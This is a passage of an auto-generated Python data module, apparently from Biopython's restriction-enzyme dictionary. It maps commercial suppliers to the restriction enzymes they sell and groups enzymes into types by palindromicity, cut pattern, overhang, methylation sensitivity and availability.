'GsaI', 'HinfI', 'MroNI', 'BsuRI', 'PpsI', 'BstPAI', 'PsiI', 'HspAI', 'RgaI', 'MspA1I', 'Fsp4HI', 'Kzo9I', 'Acc36I', 'DraIII', 'Acc16I', 'MspR9I', 'HindIII', 'Tth111I', 'EcoRV', 'AatII', 'MroXI', 'EcoRI', 'ZrmI', 'BstFNI', 'BslFI', 'Bsa29I', 'MnlI', 'SbfI', 'PstI', 'Bse8I', 'FauI', 'VspI', 'SfiI', 'Bst6I', 'BspFNI', 'Bbv12I', 'HaeIII', 'BstAPI', 'SspI', 'AfeI', 'PspOMI', 'BstMAI', 'BstSLI', 'ApaI', 'BlsI', 'Mox20I', 'FblI', 'BmuI', 'PcsI', 'BstMWI', 'BarI', 'PctI', 'FaiI', 'BpmI', 'PstNI', 'AcuI', 'AccB1I', 'PceI', 'PkrI', 'HpySE526I', 'Sse9I', 'Tru9I', 'MhlI', 'BstBAI', 'MteI', 'DriI', 'AoxI', 'EcoICRI', 'FatI', 'BamHI', 'Psp6I', 'BstAFI', 'SfaNI', 'RigI', 'HpaI', 'PspCI', 'HindII', 'PspLI', 'AsiSI'],
)
suppliers['I'] = _temp()
def _temp():
return (
'Nippon Gene Co., Ltd.',
['BssHII', 'AxyI', 'MluI', 'BclI', 'SacI', 'EcoT38I', 'BglI', 'SalI', 'MspI', 'ScaI', 'BstEII', 'NcoI', 'AgeI', 'DraI', 'BstXI', 'SwaI', 'AvaI', 'TaqI', 'AseI', 'KpnI', 'Sau96I', 'HaeII', 'NdeI', 'MboII', 'AflII', 'BglII', 'AccII', 'SacII', 'NruI', 'NarI', 'RsaI', 'HincII', 'XbaI', 'AluI', 'ScrFI', 'EcoRII', 'SmaI', 'NheI', 'StuI', 'Sau3AI', 'SpeI', 'SphI', 'FspI', 'PvuII', 'FokI', 'HinfI', 'NciI', 'EcoO109I', 'HindIII', 'EcoRV', 'EcoRI', 'XhoI', 'Bsp1286I', 'AccIII', 'PstI', 'BsmI', 'Alw44I', 'SfiI', 'HaeIII', 'NdeII', 'AccI', 'SspI', 'NsiI', 'ApaI', 'NspV', 'BalI', 'NotI', 'AcyI', 'BamHI', 'AvaII', 'HpaI', 'StyI', 'HhaI'],
)
suppliers['J'] = _temp()
def _temp():
return (
'Takara Bio Inc.',
['BssHII', 'PshBI', 'MluI', 'BspT107I', 'SacI', 'XspI', 'BglI', 'SalI', 'MspI', 'BstPI', 'ScaI', 'BanII', 'PmaCI', 'SnaBI', 'SmiI', 'BmgT120I', 'NcoI', 'ClaI', 'DraI', 'BstXI', 'PshAI', 'PvuI', 'DpnI', 'Van91I', 'Bst1107I', 'TaqI', 'EaeI', 'Eco52I', 'BspT104I', 'KpnI', 'HaeII', 'EcoO65I', 'NdeI', 'HapII', 'MboII', 'AflII', 'EcoT14I', 'BglII', 'NaeI', 'AccII', 'SacII', 'BmeT110I', 'Aor51HI', 'Bsp1407I', 'NruI', 'Sse8387I', 'CpoI', 'HincII', 'XbaI', 'MboI', 'AluI', 'BcnI', 'SmaI', 'NheI', 'StuI', 'Sau3AI', 'SpeI', 'SphI', 'PvuII', 'MflI', 'FokI', 'Hin1I', 'ApaLI', 'Cfr10I', 'HinfI', 'Psp1406I', 'EcoO109I', 'HindIII', 'Tth111I', 'EcoRV', 'AatII', 'EcoRI', 'XhoI', 'VpaK11BI', 'Bsp1286I', 'AccIII', 'Bpu1102I', 'MunI', 'Aor13HI', 'PstI', 'SfiI', 'BlnI', 'HaeIII', 'BciT130I', 'AccI', 'SspI', 'FbaI', 'Eco81I', 'ApaI', 'EcoT22I', 'BalI', 'DdeI', 'AfaI', 'NotI', 'BamHI', 'HpaI', 'HhaI'],
)
suppliers['K'] = _temp()
def _temp():
return (
'Roche Applied Science',
['BssHII', 'MluI', 'BclI', 'SacI', 'SalI', 'Asp718I', 'ScaI', 'SnaBI', 'NcoI', 'ClaI', 'Eco47III', 'DraI', 'BstXI', 'SwaI', 'PvuI', 'DpnI', 'BbrPI', 'TaqI', 'SexAI', 'KpnI', 'NdeI', 'BglII', 'MaeI', 'NruI', 'MvaI', 'NarI', 'RsaI', 'MaeII', 'AflIII', 'XbaI', 'MvnI', 'AluI', 'CfoI', 'SmaI', 'NheI', 'StuI', 'Sau3AI', 'SpeI', 'SphI', 'MaeIII', 'PvuII', 'FokI', 'HinfI', 'DraIII', 'MluNI', 'HindIII', 'EcoRV', 'AatII', 'EcoRI', 'XhoI', 'MunI', 'PstI', 'BsmI', 'SfiI', 'BlnI', 'HaeIII', 'NdeII', 'AccI', 'NsiI', 'ApaI', 'SfuI', 'BfrI', 'KspI', 'Tru9I', 'DdeI', 'NotI', 'MroI', 'Asp700I', 'BamHI', 'HpaI', 'HindII'],
)
suppliers['M'] = _temp()
def _temp():
return (
'New England Biolabs',
['BssHII', 'EciI', 'BsrFI', 'DpnII', 'AlwI', 'MluI', 'AlwNI', 'NgoMIV', 'HpaII', 'TspMI', 'BclI', 'MlyI', 'BsaWI', 'SacI', 'MwoI', 'BfaI', 'DrdI', 'BmgBI', 'BglI', 'SalI', 'MspI', 'ScaI', 'BanII', 'MslI', 'BmtI', 'PspXI', 'BsaBI', 'SnaBI', 'BstEII', 'NcoI', 'BtgI', 'ClaI', 'BsaI', 'BsrBI', 'AgeI', 'XmnI', 'DraI', 'Hpy166II', 'Hpy99I', 'StyD4I', 'BstXI', 'PspGI', 'BsiHKAI', 'PpuMI', 'BsoBI', 'BlpI', 'Esp3I', 'PshAI', 'XmaI', 'BtsIMutI', 'SwaI', 'AvaI', 'PvuI', 'DpnI', 'CspCI', 'PflFI', 'BpuEI', 'PacI', 'TaqI', 'EaeI', 'SexAI', 'BsrI', 'AseI', 'KpnI', 'Sau96I', 'BstNI', 'HaeII', 'AclI', 'ApoI', 'HpyCH4IV', 'NdeI', 'MboII', 'AflII', 'TseI', 'BglII', 'SmlI', 'NaeI', 'Bpu10I', 'SacII', 'Acc65I', 'BspQI', 'MseI', 'AvrII', 'NruI', 'BaeI', 'BtsCI', 'PciI', 'BcgI', 'BsaHI', 'SfoI', 'MspJI', 'NarI', 'Bsu36I', 'RsaI', 'HincII', 'AflIII', 'BspCNI', 'BsgI', 'XbaI', 'AbaSI', 'BfuAI', 'TfiI', 'PmlI', 'BbvI', 'MboI', 'HgaI', 'BanI', 'AluI', 'BaeGI', 'ZraI', 'Hpy188III', 'RsrII', 'BspMI', 'MluCI', 'AciI', 'ScrFI', 'MscI', 'BseYI', 'CviQI', 'BmrI', 'Hpy188I', 'SmaI', 'PleI', 'EcoNI', 'NheI', 'BccI', 'FspEI', 'BsiEI', 'StuI', 'Sau3AI', 'BcoDI', 'SpeI', 'BsiWI', 'SphI', 'HpyAV', 'FspI', 'CviAII', 'PvuII', 'Eco53kI', 'MfeI', 'BsrDI', 'BssSI', 'TspRI', 'FokI', 'ApaLI', 'ApeKI', 'HinfI', 'BciVI', 'HinP1I', 'NciI', 'PsiI', 'BceAI', 'HphI', 'MspA1I', 'BsmAI', 'DraIII', 'EcoO109I', 'HindIII', 'BtsI', 'SapI', 'Tth111I', 'EcoRV', 'AatII', 'EcoRI', 'BsmFI', 'XhoI', 'Bsp1286I', 'PluTI', 'MnlI', 'EagI', 'AscI', 'AhdI', 'NlaIII', 'SbfI', 'PstI', 'FauI', 'SfcI', 'BspEI', 'BsmI', 'SfiI', 'BstUI', 'BstZ17I', 'KasI', 'HaeIII', 'BsmBI', 'XcmI', 'LpnPI', 'BstAPI', 'AccI', 'SspI', 'HpyCH4III', 'BsrGI', 'AfeI', 'SrfI', 'SgrAI', 'NsiI', 'BspHI', 'BstYI', 'PspOMI', 'PmeI', 'FseI', 'ApaI', 'BseRI', 'MmeI', 'BtgZI', 'BpmI', 'EarI', 'CviKI_1', 'AcuI', 'NspI', 'BstBI', 'HpyCH4V', 'NlaIV', 'BbsI', 'DdeI', 'NotI', 'BsaXI', 'FatI', 'BamHI', 'BslI', 'AvaII', 'BspDI', 'PaeR7I', 'SfaNI', 'HpaI', 'BsaJI', 'BbvCI', 'Fnu4HI', 'Cac8I', 'Tsp45I', 'StyI', 'PflMI', 'HhaI', 'AsiSI', 'AleI', 'NmeAIII', 'BsaAI'],
)
suppliers['N'] = _temp()
def _temp():
return (
'Toyobo Biochemicals',
['MluI', 'BclI', 'SacI', 'BglI', 'SalI', 'ScaI', 'NcoI', 'PvuI', 'DpnI', 'PacI', 'KpnI', 'BglII', 'SacII', 'HincII', 'AluI', 'MscI', 'SmaI', 'NheI', 'SpeI', 'SphI', 'PvuII', 'HinfI', 'HindIII', 'EcoRV', 'EcoRI', 'XhoI', 'PstI', 'SfiI', 'HaeIII', 'DdeI', 'NotI', 'MroI', 'BamHI'],
)
suppliers['O'] = _temp()
def _temp():
return (
'Molecular Biology Resources - CHIMERx',
['BssHII', 'MluI', 'HpaII', 'SacI', 'BglI', 'SalI', 'MspI', 'ScaI', 'NcoI', 'ClaI', 'CviJI', 'DraI', 'BstXI', 'AcvI', 'AvaI', 'PvuI', 'DpnI', 'TaqI', 'KpnI', 'NdeI', 'MboII', 'BglII', 'SacII', 'NruI', 'NarI', 'TaqII', 'RsaI', 'HincII', 'XbaI', 'TspGWI', 'MboI', 'AluI', 'RsrII', 'SmaI', 'NheI', 'StuI', 'SpeI', 'SphI', 'PvuII', 'HinfI', 'BsiHKCI', 'HindIII', 'Tth111I', 'EcoRV', 'EcoRI', 'XhoI', 'MnlI', 'PinAI', 'PstI', 'SfiI', 'HaeIII', 'AccI', 'SspI', 'NsiI', 'ApaI', 'TspDTI', 'BalI', 'DdeI', 'NotI', 'BamHI', 'HpaI', 'HhaI'],
)
suppliers['Q'] = _temp()
def _temp():
return (
'Promega Corporation',
['BssHII', 'MluI', 'HpaII', 'BclI', 'SacI', 'BglI', 'SalI', 'MspI', 'ScaI', 'SnaBI', 'BstEII', 'NcoI', 'ClaI', 'AgeI', 'XmnI', 'Eco47III', 'DraI', 'BstXI', 'XmaI', 'PvuI', 'DpnI', 'TaqI', 'KpnI', 'HaeII', 'NdeI', 'MboII', 'BglII', 'SacII', 'NruI', 'CspI', 'NarI', 'RsaI', 'Hsp92II', 'HincII', 'XbaI', 'MboI', 'BanI', 'AluI', 'CfoI', 'SmaI', 'NheI', 'StuI', 'Sau3AI', 'SpeI', 'SphI', 'PvuII', 'HinfI', 'NciI', 'MspA1I', 'HindIII', 'SgfI', 'EcoRV', 'EcoRI', 'XhoI', 'AccIII', 'PstI', 'VspI', 'BstZI', 'SfiI', 'Hsp92I', 'HaeIII', 'AccI', 'SspI', 'NsiI', 'ApaI', 'BalI', 'Tru9I', 'DdeI', 'NotI', 'EcoICRI', 'BamHI', 'AvaII', 'HpaI', 'HhaI'],
)
suppliers['R'] = _temp()
def _temp():
return (
'Sigma Chemical Corporation',
['MluI', 'BclI', 'SacI', 'SalI', 'Asp718I', 'ScaI', 'NcoI', 'ClaI', 'Eco47III', 'DraI', 'SwaI', 'PvuI', 'DpnI', 'TaqI', 'KpnI', 'NdeI', 'BglII', 'NruI', 'RsaI', 'AflIII', 'XbaI', 'AluI', 'CfoI', 'SmaI', 'NheI', 'StuI', 'SpeI', 'SphI', 'MaeIII', 'PvuII', 'HindIII', 'EcoRV', 'EcoRI', 'XhoI', 'MunI', 'EclXI', 'PstI', 'BsmI', 'SfiI', 'BlnI', 'HaeIII', 'NsiI', 'ApaI', 'SfuI', 'BfrI', 'KspI', 'DdeI', 'NotI', 'BamHI', 'HpaI', 'HindII'],
)
suppliers['S'] = _temp()
def _temp():
return (
'Vivantis Technologies',
['BssMI', 'AsuNHI', 'MluI', 'BstHHI', 'HpaII', 'AhlI', 'BglI', 'SalI', 'PspEI', 'MspI', 'VneI', 'BstH2I', 'BmtI', 'AsiGI', 'CciNI', 'Sfr274I', 'SmiI', 'Ksp22I', 'BssT1I', 'Bsp19I', 'Bse1I', 'AspS9I', 'BmcAI', 'FauNDI', 'DraI', 'Bst2UI', 'Vha464I', 'BstXI', 'BstDEI', 'XmaI', 'BstF5I', 'BstMBI', 'BstENI', 'Ama87I', 'BstDSI', 'BstV2I', 'AspLEI', 'Zsp2I', 'DseDI', 'BstAUI', 'Bpu14I', 'TaqI', 'KpnI', 'BstSNI', 'AclI', 'MboII', 'BmrFI', 'BglII', 'AcsI', 'BstNSI', 'BmeRI', 'BseX3I', 'Bpu10I', 'Rsr2I', 'Acc65I', 'BtuMI', 'Bse118I', 'BsnI', 'BmiI', 'BsePI', 'BstMCI', 'Bme18I', 'RsaI', 'BssNAI', 'Bsp13I', 'Bst4CI', 'AsuHPI', 'XbaI', 'Psp124BI', 'BstX2I', 'AluI', 'ZraI', 'Bse21I', 'Sfr303I', 'BpuMI', 'Bse3DI', 'Bso31I', 'AccB7I', 'AccBSI', 'SmaI', 'SmiMI', 'AspA2I', 'Bsp1720I', 'SphI', 'FriOI', 'PvuII', 'BshVI', 'FokI', 'HinfI', 'MroNI', 'BstPAI', 'HspAI', 'MspA1I', 'DraIII', 'Acc16I', 'HindIII', 'Tth111I', 'EcoRV', 'AatII', 'MroXI', 'EcoRI', 'DinI', 'BstFNI', 'AfiI', 'MnlI', 'SbfI', 'PstI', 'Bse8I', 'VspI', 'SfiI', 'Bst6I', 'Msp20I', 'Bbv12I', 'SspI', 'PspOMI', 'BstMAI', 'ApaI', 'FblI', 'PctI', 'AccB1I', 'BssNI', 'PceI', 'Sse9I', 'Tru9I', 'MhlI', 'BstBAI', 'EcoICRI', 'BamHI', 'SfaNI', 'HpaI', 'PspCI', 'HindII'],
)
suppliers['V'] = _temp()
def _temp():
return (
'EURx Ltd.',
['BssHII', 'MluI', 'HpaII', 'BspTNI', 'SacI', 'BglI', 'SalI', 'MspI', 'ScaI', 'BanII', 'NcoI', 'ClaI', 'CviJI', 'DraI', 'BstXI', 'AcvI', 'AvaI', 'PvuI', 'DpnI', 'TaqI', 'SinI', 'KpnI', 'NdeI', 'MboII', 'BglII', 'SacII', 'NruI', 'NarI', 'TaqII', 'RsaI', 'HincII', 'XbaI', 'BspANI', 'TspGWI', 'MboI', 'AluI', 'RsrII', 'SmaI', 'NheI', 'StuI', 'Sau3AI', 'SpeI', 'SphI', 'PvuII', 'FokI', 'HinfI', 'BsiHKCI', 'HindIII', 'Tth111I', 'EcoRV', 'EcoRI', 'XhoI', 'MnlI', 'PinAI', 'PstI', 'BspMAI', 'SfiI', 'HaeIII', 'AccI', 'SspI', 'NsiI', 'ApaI', 'MmeI', 'TspDTI', 'BalI', 'DdeI', 'NotI', 'BamHI', 'BsuTUI', 'AvaII', 'HpaI', 'HhaI'],
)
suppliers['X'] = _temp()
def _temp():
return (
'SinaClon BioScience Co.',
['NcoI', 'BstXI', 'KpnI', 'RsaI', 'BsiSI', 'MboI', 'AluI', 'SlaI', 'SmaI', 'FokI', 'HinfI', 'HindIII', 'EcoRI', 'BamHI'],
)
suppliers['Y'] = _temp()
typedict = {}
def _temp():
return (
('Palindromic', 'TwoCuts', 'Ov5', 'Ambiguous', 'Meth_Dep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['NmeDI'],
)
typedict['type130'] = _temp()
def _temp():
return (
('Palindromic', 'TwoCuts', 'Ov5', 'Ambiguous', 'Meth_Undep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['UcoMSI'],
)
typedict['type132'] = _temp()
def _temp():
return (
('Palindromic', 'TwoCuts', 'Ov3', 'Ambiguous', 'Meth_Dep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['RdeGBIII'],
)
typedict['type142'] = _temp()
def _temp():
return (
('Palindromic', 'TwoCuts', 'Ov3', 'Ambiguous', 'Meth_Undep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['FalI', 'BplI'],
)
typedict['type143'] = _temp()
def _temp():
return (
('Palindromic', 'TwoCuts', 'Ov3', 'Ambiguous', 'Meth_Undep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['BdaI', 'AlfI'],
)
typedict['type144'] = _temp()
def _temp():
return (
('NonPalindromic', 'NoCut', 'Unknown', 'NotDefined', 'Meth_Dep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['SpoDI', 'OspHL35III', 'Xca85IV', 'Pba2294I', 'Kpn156V', 'Pcr308II', 'Cgl13032I', 'RspPBTS2III', 'Rmu369III', 'Pal408I', 'EsaSSI', 'Pse18267I', 'HpyUM032XIV', 'PpiP13II', 'BbuB31I', 'Hpy99XIV_mut1', 'Sba460II', 'AbaB8342IV', 'Eco4465II', 'Cdu23823II', 'RflFIII', 'CcrNAIII', 'Pdi8503III', 'MspI7IV', 'Bga514I', 'Bau1417V', 'Nbr128II', 'Cgl13032II', 'Lra68I', 'Adh6U21I', 'Kpn327I', 'Mlu211III', 'Pst273I', 'CjeFV', 'Bbr7017II', 'Fco1691IV', 'Asp103I', 'SenSARA26III', 'HdeNY26I', 'Lsp48III', 'EcoMVII', 'Bbr57III', 'BscGI', 'Bsp3004IV', 'DvuIII', 'SenA1673III', 'SpnRII', 'PliMI', 'EcoE1140I', 'SurP32aII', 'Ble402II', 'Ecl35734I', 'Sbo46I', 'Pac19842II', 'BbuB31II', 'HdeZA17I', 'Sno506I', 'Hpy99XIV', 'Bbr7017III', 'Aco12261II', 'AspJHL3II', 'Asp114pII', 'FspPK15I', 'SthSt3II', 'KpnNIH50I', 'Sth20745III', 'Cco14983VI', 'CfrMH16VI', 'Cdi11397I', 'Mba11I', 'EcoNIH6II', 'RdeGBI', 'Jma19592II', 'Vtu19109I', 'CjeFIII', 'FtnUV', 'Ssp714II', 'AhyYL17I', 'PinP23II', 'PflPt14I', 'Hpy300XI', 'AspNIH4III', 'Hpy99XXII', 'ObaBS10I', 'DrdII', 'Eco43896II', 'Cch467III', 'Lba2029III', 'TpyTP2I', 'Cje265V', 'MspSC27II', 'HpyAXVI_mut2', 'Bbr52II', 'AchA6III', 'BanLI', 'HbaII', 'SmaUMH5I', 'NhaXI', 'CjeNV', 'Lpl1004II', 'RpaTI', 'Vdi96II', 'BkrAM31DI', 'BspNCI', 'Cau10061II', 'PinP59III', 'PacIII', 'Cal14237I', 'Rsp531II', 'Esp3007I', 'BloAII', 'CfrMH13II', 'Cfupf3II', 'Csp2014I', 'Lde4408II', 'Ssp6803IV', 'Cba16038I', 'PfrJS12V', 'SenTFIV', 'GauT27I', 'Pdu1735I', 'HpyAXIV', 'LlaG50I', 'KpnNIH30III', 'Cba13II', 'Psp0357II', 'MtuHN878II', 'Lmo911II', 'Pst145I', 'Lsp6406VI', 'Gba708II', 'MkaDII', 'PfrJS12IV', 'Jma19592I', 'Eli8509II', 'VchE4II', 'Awo1030IV', 'Saf8902III', 'Sen17963III', 'EcoHSI', 'Nal45188II', 'BfaSII', 'Cbo67071IV', 'Mcr10I', 'Aod1I', 'Cla11845III', 'AhyRBAHI', 'MspI7II', 'Rtr1953I', 'Bve1B23I', 'Rsp008IV', 'HpyAXVI_mut1', 'Rba2021I', 'KpnNH25III', 'Lmo370I', 'ScoDS2II', 'Cco14983V', 'AbaCIII', 'CjeNII', 'AteTI', 'Aba6411II', 'SmaUMH8I', 'Sag901I', 'Rsp008V', 'AspSLV7III', 'HpyUM037X', 'OgrI', 'AspDUT2V', 'PfrJS15III', 'Jsp2502II', 'Pst14472I', 'LsaDS4I', 'Ecl234I', 'NpeUS61II', 'Acc65V', 'Bsp460III', 'Cje54107III', 'Cma23826I', 'Hpy99XIII', 'TspARh3I', 'AcoY31II', 'Cly7489II', 'CalB3II', 'Bag18758I', 'Kor51II', 'Van9116I', 'Asu14238IV', 'Pin17FIII', 'HpyUM032XIII_mut1', 'PcaII', 'Bce3081I'],
)
typedict['type146'] = _temp()
def _temp():
return (
('NonPalindromic', 'NoCut', 'Unknown', 'NotDefined', 'Meth_Undep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['UbaF14I', 'CjeP659IV', 'PsuGI', 'CjuII', 'AlwFI', 'BspGI', 'Pfl1108I', 'UbaF13I', 'AbaUMB2I', 'RlaI', 'PenI', 'UbaF12I', 'TsuI', 'UbaF9I', 'FinI', 'UbaF11I', 'UbaPI', 'BmgI'],
)
typedict['type148'] = _temp()
def _temp():
return (
('Palindromic', 'NoCut', 'Unknown', 'NotDefined', 'Meth_Dep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['MjaIV', 'HpyUM032XIII'],
)
typedict['type2'] = _temp()
def _temp():
return (
('NonPalindromic', 'OneCut', 'Blunt', 'Defined', 'Meth_Dep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['MlyI', 'BsrBI'],
)
typedict['type209'] = _temp()
def _temp():
return (
('NonPalindromic', 'OneCut', 'Blunt', 'Defined', 'Meth_Dep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['NgoAVII'],
)
typedict['type210'] = _temp()
def _temp():
return (
('NonPalindromic', 'OneCut', 'Blunt', 'Defined', 'Meth_Undep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['BmgBI', 'SchI', 'BtrI', 'AjiI', 'AccBSI', 'MbiI'],
)
typedict['type211'] = _temp()
def _temp():
return (
('NonPalindromic', 'OneCut', 'Blunt', 'Defined', 'Meth_Undep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['CdiI', 'SspD5I'],
)
typedict['type212'] = _temp()
def _temp():
return (
('NonPalindromic', 'OneCut', 'Ov5', 'Defined', 'Meth_Dep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['AciI', 'BspACI', 'BssSI', 'BbvCI'],
)
typedict['type221'] = _temp()
def _temp():
return (
('NonPalindromic', 'OneCut', 'Ov5', 'Defined', 'Meth_Undep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['SsiI', 'Bst2BI', 'PspFI', 'BseYI', 'BauI'],
)
typedict['type223'] = _temp()
def _temp():
return (
('NonPalindromic', 'OneCut', 'Ov5', 'Defined', 'Meth_Undep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['SimI', 'GdiII', 'BsiI'],
)
typedict['type224'] = _temp()
def _temp():
return (
('NonPalindromic', 'OneCut', 'Ov5', 'Ambiguous', 'Meth_Dep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['AlwI', 'BsaI', 'Esp3I', 'Bpu10I', 'Lsp1109I', 'BfuAI', 'BbvI', 'HgaI', 'BspMI', 'PleI', 'BccI', 'BcoDI', 'FokI', 'Alw26I', 'Eco31I', 'BceAI', 'BsmAI', 'SapI', 'BsmFI', 'BsmBI', 'BtgZI', 'EarI'],
)
typedict['type225'] = _temp()
def _temp():
return (
('NonPalindromic', 'OneCut', 'Ov5', 'Ambiguous', 'Meth_Dep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['StsI', 'BscAI'],
)
typedict['type226'] = _temp()
def _temp():
return (
('NonPalindromic', 'OneCut', 'Ov5', 'Ambiguous', 'Meth_Undep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['BspTNI', 'LweI', 'PciSI', 'CseI', 'AclWI', 'BseXI', 'BstV2I', 'AarI', 'LguI', 'BmsI', 'BspQI', 'MspJI', 'BstV1I', 'Bso31I', 'FaqI', 'FspEI', 'BveI', 'PpsI', 'Eam1104I', 'Acc36I', 'BspPI', 'BslFI', 'FauI', 'Bst6I', 'BpiI', 'LpnPI', 'BstMAI', 'BbsI', 'SfaNI'],
)
typedict['type227'] = _temp()
def _temp():
return (
('NonPalindromic', 'OneCut', 'Ov5', 'Ambiguous', 'Meth_Undep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['SgrTI', 'Sth132I', 'EcoBLMcrX', 'BbvII', 'BinI', 'AspBHI', 'BspD6I', 'BcefI', 'AceIII', 'Ksp632I'],
)
typedict['type228'] = _temp()
def _temp():
return (
('NonPalindromic', 'OneCut', 'Ov3', 'Defined', 'Meth_Undep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['GsaI'],
)
typedict['type235'] = _temp()
def _temp():
return (
('NonPalindromic', 'OneCut', 'Ov3', 'Ambiguous', 'Meth_Dep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['BstF5I', 'BpuEI', 'BsrI', 'MboII', 'TaqII', 'BspCNI', 'BsgI', 'TspGWI', 'BmrI', 'HpyAV', 'HphI', 'BseMII', 'MnlI', 'BseRI', 'MmeI', 'Eco57I', 'BpmI', 'AcuI', 'NmeAIII'],
)
typedict['type237'] = _temp()
def _temp():
return (
('NonPalindromic', 'OneCut', 'Ov3', 'Ambiguous', 'Meth_Dep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['MaqI', 'RpaBI', 'DraRI', 'SdeAI', 'RceI', 'WviI', 'BfiI', 'CstMI', 'PspOMII', 'TaqIII', 'RlaII', 'DrdIV', 'CchII', 'AmaCSI', 'PlaDI', 'NmeA6CIII', 'TsoI', 'SstE37I', 'RpaB5I', 'CdpI', 'CchIII', 'CjeNIII', 'BsbI', 'NlaCI', 'AquII', 'AquIV', 'ApyPI', 'Tth111II', 'RpaI', 'PspPRI', 'AquIII', 'RdeGBII'],
)
typedict['type238'] = _temp()
def _temp():
return (
('NonPalindromic', 'OneCut', 'Ov3', 'Ambiguous', 'Meth_Undep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['EciI', 'Mva1269I', 'Bse1I', 'LmnI', 'BtsIMutI', 'GsuI', 'BtsCI', 'BsuI', 'AsuHPI', 'AbaSI', 'BseGI', 'Bse3DI', 'BsrDI', 'BciVI', 'BtsI', 'BfuI', 'BsmI', 'BseMI', 'TspDTI', 'BmuI', 'PctI', 'BseNI'],
)
typedict['type239'] = _temp()
def _temp():
return (
('NonPalindromic', 'OneCut', 'Ov3', 'Ambiguous', 'Meth_Undep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['BmeDI', 'Bce83I', 'Hin4II', 'Eco57MI', 'YkrI', 'RleAI'],
)
typedict['type240'] = _temp()
def _temp():
return (
('NonPalindromic', 'TwoCuts', 'Ov5', 'Ambiguous', 'Meth_Dep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['BceSIV'],
)
typedict['type274'] = _temp()
def _temp():
return (
('NonPalindromic', 'TwoCuts', 'Ov3', 'Ambiguous', 'Meth_Dep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['CspCI', 'AloI', 'BcgI'],
)
typedict['type285'] = _temp()
def _temp():
return (
('NonPalindromic', 'TwoCuts', 'Ov3', 'Ambiguous', 'Meth_Dep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['TstI', 'NgoAVIII', 'PpiI', 'SdeOSI', 'CjeI'],
)
typedict['type286'] = _temp()
def _temp():
return (
('NonPalindromic', 'TwoCuts', 'Ov3', 'Ambiguous', 'Meth_Undep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['PsrI', 'AjuI', 'BaeI', 'ArsI', 'BarI', 'BsaXI'],
)
typedict['type287'] = _temp()
def _temp():
return (
('NonPalindromic', 'TwoCuts', 'Ov3', 'Ambiguous', 'Meth_Undep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['CjePI', 'Bsp24I', 'Hin4I'],
)
typedict['type288'] = _temp()
def _temp():
return (
('Palindromic', 'NoCut', 'Unknown', 'NotDefined', 'Meth_Undep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['NhoI', 'CjuI', 'AvaIII', 'TssI', 'Dde51507I', 'SnaI', 'HgiEII'],
)
typedict['type4'] = _temp()
def _temp():
return (
('Palindromic', 'OneCut', 'Blunt', 'Defined', 'Meth_Dep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['ScaI', 'SnaBI', 'CviJI', 'XmnI', 'DraI', 'AluBI', 'PshAI', 'SwaI', 'NaeI', 'NruI', 'SfoI', 'RsaI', 'HincII', 'BstC8I', 'PmlI', 'AluI', 'Hpy8I', 'SmaI', 'FspI', 'PvuII', 'BsuRI', 'MspA1I', 'EcoRV', 'BstUI', 'HaeIII', 'SspI', 'BalI', 'NlaIV', 'HpaI', 'Cac8I', 'HindII', 'AleI', 'BsaAI'],
)
typedict['type65'] = _temp()
def _temp():
return (
('Palindromic', 'OneCut', 'Blunt', 'Defined', 'Meth_Dep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['FnuDII', 'EsaBC3I', 'CviRI'],
)
typedict['type66'] = _temp()
def _temp():
return (
('Palindromic', 'OneCut', 'Blunt', 'Defined', 'Meth_Undep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['PspN4I', 'MslI', 'Bsp68I', 'PmaCI', 'BsaBI', 'SmiI', 'BseJI', 'BshFI', 'BmcAI', 'Eco47III', 'Hpy166II', 'AcvI', 'RruI', 'EgeI', 'OliI', 'DpnI', 'Bst1107I', 'BbrPI', 'BstSNI', 'RseI', 'MlsI', 'AccII', 'BtuMI', 'Aor51HI', 'Bsh1236I', 'MalI', 'MssI', 'BsnI', 'FspAI', 'BmiI', 'BoxI', 'BssNAI', 'BspANI', 'GlaI', 'MvnI', 'ZraI', 'Eco72I', 'MscI', 'SseBI', 'SmiMI', 'Ppu21I', 'StuI', 'Eco53kI', 'EheI', 'BstPAI', 'PsiI', 'Ecl136II', 'Acc16I', 'MluNI', 'MroXI', 'ZrmI', 'DinI', 'BstFNI', 'BspLI', 'Eco105I', 'NsbI', 'Bse8I', 'BspFNI', 'BstZ17I', 'Msp20I', 'AfeI', 'SrfI', 'Eco32I', 'KspAI', 'AanI', 'PmeI', 'Mox20I', 'FaiI', 'Eco147I', 'CviKI_1', 'PdmI', 'HpyCH4V', 'PceI', 'BstBAI', 'AfaI', 'Asp700I', 'EcoICRI', 'PspCI', 'PdiI'],
)
typedict['type67'] = _temp()
def _temp():
return (
('Palindromic', 'OneCut', 'Blunt', 'Defined', 'Meth_Undep', 'Not_available', 'AbstractCut', 'RestrictionType'),
